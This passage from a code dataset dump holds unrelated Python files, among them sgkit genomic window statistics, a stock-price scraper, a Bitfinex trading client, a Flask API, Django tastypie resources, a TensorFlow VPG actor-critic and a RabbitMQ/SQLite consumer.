functions to calculate statistics for\n each window.\n\n Parameters\n ----------\n ds\n Genotype call dataset.\n size\n The window size (number of variants).\n step\n The distance (number of variants) between start positions of windows.\n Defaults to ``size``.\n merge\n If True (the default), merge the input dataset and the computed\n output variables into a single dataset, otherwise return only\n the computed output variables.\n See :ref:`dataset_merge` for more details.\n\n Returns\n -------\n A dataset containing the following variables:\n\n - :data:`sgkit.variables.window_start_spec` (windows):\n The index values of window start positions.\n - :data:`sgkit.variables.window_stop_spec` (windows):\n The index values of window stop positions.\n \"\"\"\n step = step or size\n n_variants = ds.dims[\"variants\"]\n n_contigs = len(ds.attrs[\"contigs\"])\n contig_ids = np.arange(n_contigs)\n variant_contig = ds[\"variant_contig\"]\n contig_starts = np.searchsorted(variant_contig.values, contig_ids)\n contig_bounds = np.append(contig_starts, [n_variants], axis=0)\n\n contig_window_contigs = []\n contig_window_starts = []\n contig_window_stops = []\n for i in range(n_contigs):\n starts, stops = _get_windows(contig_bounds[i], contig_bounds[i + 1], size, step)\n contig_window_starts.append(starts)\n contig_window_stops.append(stops)\n contig_window_contigs.append(np.full_like(starts, i))\n\n window_contigs = np.concatenate(contig_window_contigs)\n window_starts = np.concatenate(contig_window_starts)\n window_stops = np.concatenate(contig_window_stops)\n\n new_ds = Dataset(\n {\n window_contig: (\n \"windows\",\n window_contigs,\n ),\n window_start: (\n \"windows\",\n window_starts,\n ),\n window_stop: (\n \"windows\",\n window_stops,\n ),\n }\n )\n return conditional_merge_datasets(ds, new_ds, merge)\n\n\ndef _get_windows(\n start: int, stop: int, size: int, step: int\n) -> Tuple[ArrayLike, ArrayLike]:\n # Find the indexes for the start positions of all windows\n window_starts = np.arange(start, stop, step)\n window_stops = np.clip(window_starts + size, start, stop)\n return window_starts, window_stops\n\n\n# Computing statistics for windows (internal code)\n\n\ndef has_windows(ds: Dataset) -> bool:\n \"\"\"Test if a dataset has windowing information.\"\"\"\n return window_start in ds and window_stop in ds\n\n\ndef moving_statistic(\n values: ArrayLike,\n statistic: Callable[..., ArrayLike],\n size: int,\n step: int,\n dtype: DType,\n **kwargs: Any,\n) -> da.Array:\n \"\"\"A Dask implementation of scikit-allel's moving_statistic function.\"\"\"\n length = values.shape[0]\n chunks = values.chunks[0]\n if len(chunks) > 1:\n min_chunksize = np.min(chunks[:-1]) # ignore last chunk\n else:\n min_chunksize = np.min(chunks)\n if min_chunksize < size:\n raise ValueError(\n f\"Minimum chunk size ({min_chunksize}) must not be smaller than size ({size}).\"\n )\n window_starts, window_stops = _get_windows(0, length, size, step)\n return window_statistic(\n values, statistic, window_starts, window_stops, dtype, **kwargs\n )\n\n\ndef window_statistic(\n values: ArrayLike,\n statistic: Callable[..., ArrayLike],\n window_starts: ArrayLike,\n window_stops: ArrayLike,\n dtype: DType,\n chunks: Any = None,\n new_axis: Union[None, int, Iterable[int]] = None,\n **kwargs: Any,\n) -> da.Array:\n\n values = da.asarray(values)\n desired_chunks = chunks or values.chunks\n\n window_lengths = window_stops - window_starts\n depth = np.max(window_lengths)\n\n # Dask will raise an error if the last chunk size is smaller than the 
depth\n # Workaround by rechunking to combine the last two chunks in first axis\n # See https://github.com/dask/dask/issues/6597\n if depth > values.chunks[0][-1]:\n chunk0 = values.chunks[0]\n new_chunk0 = tuple(list(chunk0[:-2]) + [chunk0[-2] + chunk0[-1]])\n values = values.rechunk({0: new_chunk0})\n\n chunks = values.chunks[0]\n\n rel_window_starts, windows_per_chunk = _get_chunked_windows(\n chunks, window_starts, window_stops\n )\n\n # Add depth for map_overlap\n rel_window_starts = rel_window_starts + depth\n rel_window_stops = rel_window_starts + window_lengths\n\n chunk_offsets = _sizes_to_start_offsets(windows_per_chunk)\n\n def blockwise_moving_stat(x: ArrayLike, block_info: Any = None) -> ArrayLike:\n if block_info is None or len(block_info) == 0:\n return np.array([])\n chunk_number = block_info[0][\"chunk-location\"][0]\n chunk_offset_start = chunk_offsets[chunk_number]\n chunk_offset_stop = chunk_offsets[chunk_number + 1]\n chunk_window_starts = rel_window_starts[chunk_offset_start:chunk_offset_stop]\n chunk_window_stops = rel_window_stops[chunk_offset_start:chunk_offset_stop]\n out = np.array(\n [\n statistic(x[i:j], **kwargs)\n for i, j in zip(chunk_window_starts, chunk_window_stops)\n ]\n )\n return out\n\n if values.ndim == 1:\n new_chunks = (tuple(windows_per_chunk),)\n else:\n # depth is 0 except in first axis\n depth = {0: depth}\n # new chunks are same except in first axis\n new_chunks = tuple([tuple(windows_per_chunk)] + list(desired_chunks[1:])) # type: ignore\n return values.map_overlap(\n blockwise_moving_stat,\n dtype=dtype,\n chunks=new_chunks,\n depth=depth,\n boundary=0,\n trim=False,\n new_axis=new_axis,\n )\n\n\ndef _sizes_to_start_offsets(sizes: ArrayLike) -> ArrayLike:\n \"\"\"Convert an array of sizes, to cumulative offsets, starting with 0\"\"\"\n return np.cumsum(np.insert(sizes, 0, 0, axis=0))\n\n\ndef _get_chunked_windows(\n chunks: ArrayLike,\n window_starts: ArrayLike,\n window_stops: ArrayLike,\n) -> Tuple[ArrayLike, ArrayLike]:\n \"\"\"Find the window start positions relative to the start of the chunk they are in,\n and the number of windows in each chunk.\"\"\"\n\n # Find the indexes for the start positions of all chunks\n chunk_starts = _sizes_to_start_offsets(chunks)\n\n # Find which chunk each window falls in\n chunk_numbers = np.searchsorted(chunk_starts, window_starts, side=\"right\") - 1\n\n # Find the start positions for each window relative to each chunk start\n rel_window_starts = window_starts - chunk_starts[chunk_numbers]\n\n # Find the number of windows in each chunk\n unique_chunk_numbers, unique_chunk_counts = np.unique(\n chunk_numbers, return_counts=True\n )\n windows_per_chunk = np.zeros_like(chunks)\n windows_per_chunk[unique_chunk_numbers] = unique_chunk_counts # set non-zero counts\n\n return rel_window_starts, windows_per_chunk\n","sub_path":"sgkit/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":7598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"583528767","text":"import json\n\nwith open('E:\\states.json') as f:\n data=json.load(f)\n\n for state in data['states']:\n del state['area_codes']\n print(state)\n\n with open('E:\\states2.json','w') as f:\n json.dump(data,f)\n ","sub_path":"sum/com/naresh/fileOperations.py","file_name":"fileOperations.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"125838042","text":"for _ in 
range(int(input())):\n\tn=int(input())\n\tarr=[int(i) for i in input().split()]\n\tsumi=sum(arr)\n\tif 0 not in arr:\n\t\tprint(-1)\n\t\tcontinue\n\tarr.sort()\n\tif sumi%3!=0:\n\t\tx=sumi%3\n\t\tchk=0\n\t\tfor i in range(len(arr)):\n\t\t\tif arr[i]%3==x:\n\t\t\t\tarr.pop(i)\n\t\t\t\tchk=1\n\t\t\t\tbreak\n\t\tif chk==0:\n\t\t\tfor i in range(len(arr)):\n\t\t\t\tif arr[i]%3==1:\n\t\t\t\t\trem=[i]\n\t\t\t\t\tk=i+1\n\t\t\t\t\twhile k|]+'\nBRAND_CODE_PARAMETER = 'stock/[0-9]+'\nPAGE_PARAMETER = '\\?page=[0-9]+'\nBRAND_CODE_AND_YEAR_PARAMETER = 'stock/[0-9]+/[0-9]+'\n\n\ndef __GetExistBrandDictionary():\n existBrandDDict = {}\n for csvFile in glob(CSVFILE_STORE_FOLDER_NAME + '//*' + CSVFILE_EXTENSION):\n csvFileName = os.path.splitext(os.path.basename(csvFile))[0]\n\n if csvFileName in existBrandDDict:\n continue\n\n existBrandDDict[csvFileName] = pd.read_csv(csvFile, encoding='UTF-8')\n\n return existBrandDDict\n\n\ndef __GetBrandCodeFromCSVFile(csvFile):\n csvFileName = os.path.splitext(os.path.basename(csvFile))[0]\n companyNameFromCSVFile = re.search(' .*', csvFileName)[0]\n return csvFileName.replace(companyNameFromCSVFile, '')\n\n\ndef __stripInvalidCharacterFromFileName(fileName):\n return re.sub(CSV_NAME_UNUSABLE_WORDS, '', fileName)\n\n\ndef __DeleteDisappearedBrandCSV(existBrandDDict, brandOnWeb):\n for brand in existBrandDDict.keys():\n if brand not in brandOnWeb:\n os.remove(CSVFILE_STORE_FOLDER_NAME + '//' + brand + CSVFILE_EXTENSION)\n\n\ndef __GetExistBrandStockPriceDataFrame(urlTag, existBrandDDict, csvFileName):\n\n latestStockPriceDataFrame = pd.read_html(urlTag.attrs['href'])[0]\n time.sleep(1)\n mergedStockPriceDataFrame = pd.concat([latestStockPriceDataFrame, existBrandDDict[csvFileName]])\n mergedStockPriceDataFrame.drop_duplicates(inplace=True)\n\n return mergedStockPriceDataFrame\n\n\ndef __GetAllDayStockPriceDataFrame(urlTag):\n individualStockPriceDataFrame = pd.DataFrame(None)\n\n response_IndividualStockPricePerYear = request.urlopen(urlTag.attrs['href'])\n bs_GetIndividualStockPricePerYear = BeautifulSoup(response_IndividualStockPricePerYear, 'html.parser')\n time.sleep(1)\n\n for individualStockPricePerYearTag in bs_GetIndividualStockPricePerYear.find_all(\"a\", href=re.compile(BRAND_CODE_AND_YEAR_PARAMETER)):\n individualStockPriceFromHtml = pd.read_html(individualStockPricePerYearTag.attrs['href'])\n\n if individualStockPriceFromHtml is None:\n continue\n\n individualStockPriceDataFrame = pd.concat([individualStockPriceDataFrame, individualStockPriceFromHtml[0]])\n time.sleep(1)\n\n return individualStockPriceDataFrame\n\n\ndef ExportIndividualStockPrice():\n\n existBrandDDict = __GetExistBrandDictionary()\n brandOnWeb = []\n\n try:\n response_StockPriceTop = request.urlopen(SOURCE_URL)\n bs_GetStockPriceTop = BeautifulSoup(response_StockPriceTop, 'html.parser')\n time.sleep(1)\n\n stockPriceTopPageParameters = bs_GetStockPriceTop.find_all(\"a\", href=re.compile(PAGE_PARAMETER))\n list_allStockPricePageURL = [SOURCE_URL + stockPriceTopPageParameters[i].attrs['href'] for i in range(len(stockPriceTopPageParameters))]\n\n for idx in range(len(list_allStockPricePageURL)):\n response_IndividualStockPrice = request.urlopen(list_allStockPricePageURL[idx])\n bs_GetIndividualStockPrice = BeautifulSoup(response_IndividualStockPrice, 'html.parser')\n time.sleep(1)\n\n for urlTag in bs_GetIndividualStockPrice.find_all(\"a\", href=re.compile(BRAND_CODE_PARAMETER)):\n csvFileName = urlTag.text\n\n if csvFileName in existBrandDDict:\n outIndividualStockPriceDataFrame = 
__GetExistBrandStockPriceDataFrame(urlTag, existBrandDDict, csvFileName)\n else:\n outIndividualStockPriceDataFrame = __GetAllDayStockPriceDataFrame(urlTag)\n\n csvFilePath = CSVFILE_STORE_FOLDER_NAME + '\\\\' + __stripInvalidCharacterFromFileName(csvFileName) + CSVFILE_EXTENSION\n outIndividualStockPriceDataFrame.sort_values(DROP_COLUMN_NAME_DATE, inplace=True)\n outIndividualStockPriceDataFrame.to_csv(csvFilePath, index=False)\n\n brandOnWeb.append(csvFileName)\n\n except Exception as ex:\n logger.info(StockPriceCSVMessage.scrapingError + str(ex))\n return str(ex)\n\n __DeleteDisappearedBrandCSV(existBrandDDict, brandOnWeb)\n\n return None\n","sub_path":"main/stockPriceAnalize/StockPriceCSV.py","file_name":"StockPriceCSV.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"270989177","text":"from .market import Market\nfrom decimal import Decimal\nimport time\nimport base64\nimport hmac\nimport urllib.request\nimport urllib.parse\nimport urllib.error\nimport hashlib\nimport sys\nimport json\nimport re\nimport logging\nimport config\n\n\nclass PrivateBitfinexUSD(Market):\n def __init__(self):\n super().__init__()\n self.order_url = \"https://api.bitfinex.com/v1/order/new\"\n self.balance_url = \"https://api.bitfinex.com/v1/balances\"\n self.key = config.bitfinex_apikey\n self.secret = config.bitfinex_apisecret\n self.currency = \"USD\"\n self.get_info()\n\n def _prepare_payload(self, should_sign, d):\n j = json.dumps(d)\n data = base64.standard_b64encode(j.encode('ascii'))\n\n if should_sign:\n h = hmac.new(self.secret.encode('ascii'), data, hashlib.sha384)\n signature = h.hexdigest()\n\n return {\n \"X-BFX-APIKEY\": self.key,\n \"X-BFX-SIGNATURE\": signature,\n \"X-BFX-PAYLOAD\": data,\n }\n else:\n return {\n \"X-BFX-PAYLOAD\": data,\n }\n\n def trade(self, amount, side, price):\n payload = {}\n payload[\"request\"] = \"/v1/order/new\"\n payload[\"nonce\"] = str(int(time.time() * 100000))\n headers = self._prepare_payload(True, payload)\n params = [(\"symbol\", \"btcusd\"),\n (\"amount\", float(amount)), # Decimal would be better but sometimes has issues with the JSON module...\n (\"price\", float(price)),\n (\"exchange\", \"bitfinex\"), # only BFX internal!\n (\"side\", side),\n (\"type\", \"exchange limit\")] # NOT \"limit\" - that's on margin!\n data = urllib.parse.urlencode(params).encode('ascii') # the request body must be bytes\n req = urllib.request.Request(\n self.order_url,\n data,\n headers)\n res = urllib.request.urlopen(req)\n # TODO: return None on error\n # TODO: make sure that the transaction actually took place\n answer = json.loads(res.read().decode('utf8'))\n print(answer)\n return \"success\"\n\n def _buy(self, amount, price):\n return self.trade(amount, \"buy\", price)\n\n def _sell(self, amount, price):\n return self.trade(amount, \"sell\", price)\n\n def withdraw(self, amount, address):\n # TODO: implement\n return None\n\n def deposit(self):\n # TODO: implement\n return None\n\n def get_info(self):\n payload = {}\n payload[\"request\"] = \"/v1/balances\"\n payload[\"nonce\"] = str(int(time.time() * 100000))\n headers = self._prepare_payload(True, payload)\n req = urllib.request.Request(\n self.balance_url,\n None,\n headers)\n res = urllib.request.urlopen(req)\n # TODO: return None on error\n answer = json.loads(res.read().decode('utf8'))\n for balance in answer:\n if balance['type'] == \"exchange\":\n if balance['currency'] == \"btc\":\n self.btc_balance = float(balance['available']) # or 'amount'?\n elif balance['currency'] == \"usd\":\n self.usd_balance = float(balance['available'])\n return 1
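\n\n# Usage sketch (assumes valid config.bitfinex_apikey/apisecret and network access):\n# market = PrivateBitfinexUSD() # fetches balances via get_info() on construction\n# market.trade(0.01, \"buy\", 9000.0) # submits an exchange-limit order and returns \"success\"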
","sub_path":"arbitrage/private_markets/bitfinexusd.py","file_name":"bitfinexusd.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"257941501","text":"\n\n# class header\nclass _FLUTTER():\n\tdef __init__(self):\n\t\tself.name = \"FLUTTER\"\n\t\tself.definitions = [u'to make a series of quick delicate movements up and down or from side to side, or to cause something to do this: ', u'If your heart or stomach flutters, you feel slightly uncomfortable because you are excited or nervous: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_flutter.py","file_name":"_flutter.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"58813642","text":"'''\nmodule to define all class entities\n'''\nfrom ipware.ip import get_ip\n\nimport traceback\n\nfrom datetime import date, datetime\n\nfrom tastypie import http\nfrom tastypie.authentication import SessionAuthentication as _SessionAuthentication\nfrom tastypie.authorization import Authorization\nfrom tastypie.exceptions import ImmediateHttpResponse\nfrom tastypie.serializers import Serializer\nfrom tastypie.resources import NamespacedModelResource, Resource\n\nfrom common.entity import KnownException\nfrom common.functions import get_apiname_from_path\nfrom members.access import get_login_member_details\nfrom members.dataaccess import add_member_activity\n\nclass TastyPieDateSerializer(Serializer):\n def format_date(self, data):\n data = super(TastyPieDateSerializer,self).format_date(data)\n try:\n return datetime.strptime(data, \"%Y-%m-%d\").strftime(\"%d/%m/%Y\")\n except Exception:\n return data\n\nclass SessionAuthentication(_SessionAuthentication):\n def is_authenticated(self, request, **kwargs):\n response = super(SessionAuthentication, self).is_authenticated(request, **kwargs)\n if not response:\n response = http.HttpUnauthorized()\n response.status_code = 403\n return response\n\nclass ACPCResource(Resource):\n def _handle_500(self, request, exception):\n if isinstance(exception, KnownException):\n data = {\n 'error_message': exception.message,\n 'type': 'knownexception',\n }\n return self.error_response(\n request,\n data,\n response_class=http.HttpApplicationError\n )\n else:\n traceback.print_exc()\n return super(ACPCResource, self)._handle_500(request, exception)\n\n def dispatch(self, request_type, request, **kwargs):\n request.member_details = set_member_details(request, request.user)\n return super(ACPCResource, self).dispatch(request_type, request, **kwargs)\n\nclass ACPCNamespacedModelResource(NamespacedModelResource):\n def _handle_500(self, request, exception):\n if isinstance(exception, KnownException):\n data = {\n 'error_message': exception.message,\n 'type': 'knownexception',\n }\n return self.error_response(\n request,\n data,\n response_class=http.HttpApplicationError\n )\n else:\n traceback.print_exc()\n return super(ACPCNamespacedModelResource, self)._handle_500(request, exception)\n\n def dispatch(self, request_type, request, **kwargs):\n request.member_details = set_member_details(request, request.user)\n return super(ACPCNamespacedModelResource, 
self).dispatch(request_type, request, **kwargs)\n\ndef set_member_details(request, loggedin_member):\n member_details = None\n api_name = get_apiname_from_path(request.path)\n if api_name != \"login_user_detail\":\n if api_name != \"member_activity\":\n log_user_activity(request)\n member_details = get_login_member_details(loggedin_member, api_name, False)\n return member_details\n\ndef log_user_activity(request):\n try:\n if request.user.is_authenticated():\n loggedin_member = request.user\n else:\n loggedin_member = None\n ip_address = get_ip(request)\n url = request.path\n method = request.META.get(\"REQUEST_METHOD\")\n session_key = request.COOKIES.get(\"sessionid\")\n add_member_activity(loggedin_member, session_key, ip_address, url, method)\n except:\n pass\n return True\n","sub_path":"members/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"633989084","text":"#Visualizations of volume traded/percentage difference in trading volume week to week\n\nimport numpy as np\nimport sys\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure\n\n\ndef get_vol_traded(stocks_df, stock):\n '''\n This function will create a list, the y coordinates, \n of the percent change in volume traded for the given stock \n '''\n perc_change_vol = []\n #perc_change_vol_df = pd.DataFrame(stocks_df.loc[:, 'percent_change_volume_over_last_wk'])\n row_indices = stocks_df.index[stocks_df['stock'] == stock].tolist()\n row_indices = row_indices[1:]\n for i in range(len(row_indices)):\n perc_change_vol.append(stocks_df.at[row_indices[i], 'percent_change_volume_over_last_wk'])\n return perc_change_vol\n\n\ndef plot_vol_traded(stocks_df, stock, save_file=False):\n first_quar_dates_excluding_first = list(stocks_df.loc[1:11, 'date'])\n second_quar_dates = list(stocks_df.loc[360:372, 'date'])\n dates_excluding_first = first_quar_dates_excluding_first + second_quar_dates\n \n figure(figsize=(25, 12))\n vol_traded = get_vol_traded(stocks_df, stock)\n plt.plot(dates_excluding_first, vol_traded, label = stock)\n plt.legend()\n plt.xlabel('Dates')\n plt.ylabel('Percent Change')\n plt.title('Percent Change in Volume Traded by Week')\n if save_file:\n plt.savefig('./visualizations/vol_traded_' + stock + '.png')\n return plt \n\n\nif __name__ == '__main__':\n stocks_df = pd.read_csv('./final_project.csv')\n stock_list = np.sort(np.unique(stocks_df.stock.values))\n \n # By default generate charts for the first 3 stocks\n default_stocks = stock_list[:3]\n \n # Use stock names from command line arguments, if passed\n arg_stocks = sys.argv[1:]\n \n stocks_to_display = default_stocks if len(arg_stocks) == 0 else arg_stocks\n for stock in stocks_to_display:\n plot_vol_traded(stocks_df, stock, True)","sub_path":"code/volume_traded.py","file_name":"volume_traded.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"530510448","text":"\"\"\"Core functions of the VPG algorithm.\"\"\"\nimport gym\nimport numpy as np\nimport scipy.signal\nimport tensorflow as tf\n\n\nEPS = 1e-8\n\nLOG_STD_MAX = 2\nLOG_STD_MIN = -20\n\n\ndef distribute_value(value, num_proc):\n \"\"\"Adjusts training parameters for distributed training.\n\n In case of distributed training frequencies expressed in global steps have\n to be adjusted to local steps, thus divided by the number of processes.\n \"\"\"\n 
return max(value // num_proc, 1)\n\n\ndef combined_shape(length, shape=None):\n if shape is None:\n return (length,)\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\n\ndef discount_cumsum(x, discount):\n \"\"\"Magic from rllab for computing discounted cumulative sums of vectors.\"\"\"\n return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[\n ::-1]\n\n\n@tf.function\ndef gaussian_likelihood(value, mu, log_std):\n \"\"\"Calculates value's likelihood under Gaussian pdf.\"\"\"\n pre_sum = -0.5 * (\n ((value - mu) / (tf.exp(log_std) + EPS)) ** 2 +\n 2 * log_std + np.log(2 * np.pi)\n )\n return tf.reduce_sum(pre_sum, axis=1)\n\n\ndef mlp(hidden_sizes=(64, 32), activation='relu', output_activation=None,\n layer_norm=False):\n \"\"\"Creates MLP with the specified parameters.\"\"\"\n model = tf.keras.Sequential()\n\n for h in hidden_sizes[:-1]:\n model.add(tf.keras.layers.Dense(units=h, activation=None))\n if layer_norm:\n model.add(tf.keras.layers.LayerNormalization())\n model.add(tf.keras.layers.Activation(activation))\n\n model.add(tf.keras.layers.Dense(units=hidden_sizes[-1], activation=None))\n if layer_norm:\n model.add(tf.keras.layers.LayerNormalization())\n model.add(tf.keras.layers.Activation(output_activation))\n\n return model\n\n\ndef make_actor_discrete(observation_space, action_space, hidden_sizes,\n activation, layer_norm):\n \"\"\"Creates actor tf.keras.Model.\n\n This function can be used only in environments with discrete action space.\n \"\"\"\n\n class DiscreteActor(tf.keras.Model):\n \"\"\"Actor model for discrete action space.\"\"\"\n\n def __init__(self, observation_space, action_space, hidden_sizes,\n activation, layer_norm):\n super().__init__()\n self._act_dim = action_space.n\n\n obs_input = tf.keras.Input(shape=observation_space.shape)\n actor = mlp(\n hidden_sizes=list(hidden_sizes) + [action_space.n],\n activation=activation,\n layer_norm=layer_norm\n )(obs_input)\n\n self._network = tf.keras.Model(inputs=obs_input, outputs=actor)\n\n @tf.function\n def call(self, inputs, training=None, mask=None):\n return tf.nn.log_softmax(self._network(inputs))\n\n @tf.function\n def action(self, observations):\n return tf.squeeze(tf.random.categorical(self(observations), 1),\n axis=1)\n\n @tf.function\n def action_logprob(self, observations, actions):\n return tf.reduce_sum(\n tf.math.multiply(self(observations),\n tf.one_hot(tf.cast(actions, tf.int32),\n depth=self._act_dim)), axis=-1)\n\n return DiscreteActor(observation_space, action_space, hidden_sizes,\n activation, layer_norm)\n\n\ndef make_actor_continuous(action_space, hidden_sizes,\n activation, layer_norm):\n \"\"\"Creates actor tf.keras.Model.\n\n This function can be used only in environments with continuous action space.\n \"\"\"\n\n class ContinuousActor(tf.keras.Model):\n \"\"\"Actor model for continuous action space.\"\"\"\n\n def __init__(self, action_space, hidden_sizes,\n activation, layer_norm):\n super().__init__()\n self._action_dim = action_space.shape\n\n self._body = mlp(\n hidden_sizes=list(hidden_sizes),\n activation=activation,\n layer_norm=layer_norm\n )\n\n self._mu = tf.keras.layers.Dense(self._action_dim[0], name='mean')\n self._log_std = tf.Variable(\n initial_value=-0.5 * np.ones(shape=(1,) + self._action_dim,\n dtype=np.float32), trainable=True,\n name='log_std_dev')\n\n @tf.function\n def call(self, inputs, training=None, mask=None):\n x = self._body(inputs)\n mu = self._mu(x)\n log_std = tf.clip_by_value(self._log_std, LOG_STD_MIN, LOG_STD_MAX)\n\n 
return mu, log_std\n\n @tf.function\n def action(self, observations):\n mu, log_std = self(observations)\n std = tf.exp(log_std)\n return mu + tf.random.normal(tf.shape(input=mu)) * std\n\n @tf.function\n def action_logprob(self, observations, actions):\n mu, log_std = self(observations)\n return gaussian_likelihood(actions, mu, log_std)\n\n return ContinuousActor(action_space, hidden_sizes,\n activation, layer_norm)\n\n\ndef make_critic(observation_space, hidden_sizes, activation):\n \"\"\"Creates critic tf.keras.Model\"\"\"\n obs_input = tf.keras.Input(shape=observation_space.shape)\n\n critic = tf.keras.Sequential([\n mlp(hidden_sizes=list(hidden_sizes) + [1],\n activation=activation),\n tf.keras.layers.Reshape([]),\n ])(obs_input)\n\n return tf.keras.Model(inputs=obs_input, outputs=critic)\n\n\ndef mlp_actor_critic(observation_space, action_space, hidden_sizes=(64, 32),\n activation=tf.tanh, layer_norm=False):\n \"\"\"Creates actor and critic tf.keras.Model-s.\"\"\"\n actor = None\n\n # default policy builder depends on action space\n if isinstance(action_space, gym.spaces.Discrete):\n actor = make_actor_discrete(observation_space, action_space,\n hidden_sizes,\n activation, layer_norm)\n elif isinstance(action_space, gym.spaces.Box):\n actor = make_actor_continuous(action_space,\n hidden_sizes,\n activation, layer_norm)\n\n critic = make_critic(observation_space, hidden_sizes, activation)\n\n return actor, critic\n","sub_path":"spinup_bis/algos/tf2/vpg/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"386838805","text":"from flask import Flask, jsonify\n\napp = Flask(__name__)\n\ndb = [\"Apple\",\"Mango\",\"Banana\"]\n\n@app.route(\"/\")\ndef index():\n\treturn jsonify({\"message\":\"Hello World!\"})\n\n@app.route(\"/fruits\", methods=['GET'])\ndef get_fruits():\n\treturn jsonify({\"fruits\":db})\n\n@app.route(\"/fruits/<fruitName>\", methods=['POST'])\ndef add_fruit(fruitName):\n\tdb.append(fruitName)\n\treturn jsonify({\"fruits\":db})\n\n@app.route(\"/fruits/<int:fruitID>\", methods=['GET'])\ndef get_specific_fruit(fruitID):\n\tif fruitID>0 and fruitID<=len(db):\n\t\treturn jsonify({\"fruit\":db[fruitID-1]})\n\telse:\n\t\treturn jsonify({\"fruit\":\"\"})
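\n\n# Quick smoke test using Flask's built-in test client (illustrative; exercises the routes above):\n# with app.test_client() as client:\n#\tclient.post(\"/fruits/Cherry\").get_json() # -> {\"fruits\": [\"Apple\", \"Mango\", \"Banana\", \"Cherry\"]}\n#\tclient.get(\"/fruits/1\").get_json() # -> {\"fruit\": \"Apple\"}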
\n\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)","sub_path":"Codes/simple_post_request.py","file_name":"simple_post_request.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"38521494","text":"from types import MethodType\n\nclass Student(object):\n def __init__(self,age): # define a function to serve as an instance method\n self.age=age\n\ndef old(self):\n print('age is %s' % self.age)\n\n@classmethod\ndef set_score(cls, score):\n cls.score = score\n print(cls.score)\n\n\ns = Student(20)\ns1=Student(30)\n#Student.set_score = MethodType(set_score, Student) # bind a method to the instance\nStudent.set_score=set_score\ns.set_score(50) # call the instance method\ns1.set_score(60)\n\n\n\n","sub_path":"第一期/上海-棒棒糖/第二次任务-每日代码练习/2018-3/3-8/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"543148587","text":"import pika\r\nimport json\r\nimport sqlite3\r\nimport os\r\nimport traceback\r\nimport controller\r\n\r\n\r\ndef callback(ch, method, properties, body):\r\n body_data = json.loads(body)\r\n print(\"Message received: %r\" % body_data)\r\n ch.basic_ack(delivery_tag=method.delivery_tag)\r\n path = body_data['db_path']\r\n if path is not None:\r\n create_connection(path)\r\n\r\n\r\ndef create_connection(path):\r\n print(path)\r\n with sqlite3.connect(path) as connection:\r\n print(\"First query: \\n\")\r\n table = controller.purchases_amount(connection)\r\n print(\"query1 Headers: \" + str(controller.get_columns_names(connection, \"query1\")))\r\n controller.create_table(connection, \"query1\", table)\r\n # path = r'%s' % os.getcwd().replace('\\\\', '/')\r\n controller.create_csv(table, \"first\")\r\n print(\r\n \"***********************************************************************************************************\")\r\n\r\n print(\"Second query: \\n\")\r\n table = controller.purchased_items_amount(connection)\r\n print(\"query2 Headers: \" + str(controller.get_columns_names(connection, \"query2\")))\r\n controller.create_table(connection, \"query2\", table)\r\n # path = r'%s' % os.getcwd().replace('\\\\', '/')\r\n controller.create_csv(table, \"second\")\r\n print(\r\n \"***********************************************************************************************************\")\r\n\r\n print(\"Third query: \\n\")\r\n table = controller.purchased_albums(connection)\r\n controller.create_json(table, \"third\")\r\n print(\r\n \"***********************************************************************************************************\")\r\n\r\n print(\"Fourth query: \\n\")\r\n data = controller.disc_purchase_count(connection, \"2013\", \"Canada\")\r\n path = r'%s' % os.getcwd().replace('\\\\', '/')\r\n controller.create_xml(data, \"fourth\")\r\n print(\"query4 Headers: \" + str(controller.get_columns_names(connection, \"query4\")))\r\n controller.create_table(connection, \"query4\", data)\r\n print(\r\n \"***********************************************************************************************************\")\r\n\r\ntry:\r\n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\r\n channel = connection.channel()\r\n channel.queue_declare(queue='my_queue1', durable=True)\r\n channel.basic_consume(callback, queue='my_queue1')\r\n channel.basic_qos(prefetch_count=1)\r\n print(\"Waiting for messages...\")\r\n channel.start_consuming()\r\n\r\n\r\n\r\nexcept Exception as exception:\r\n print(\"Exception\")\r\n traceback.print_exc()\r\nfinally:\r\n connection.close()\r\n","sub_path":"reciever/recive.py","file_name":"recive.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
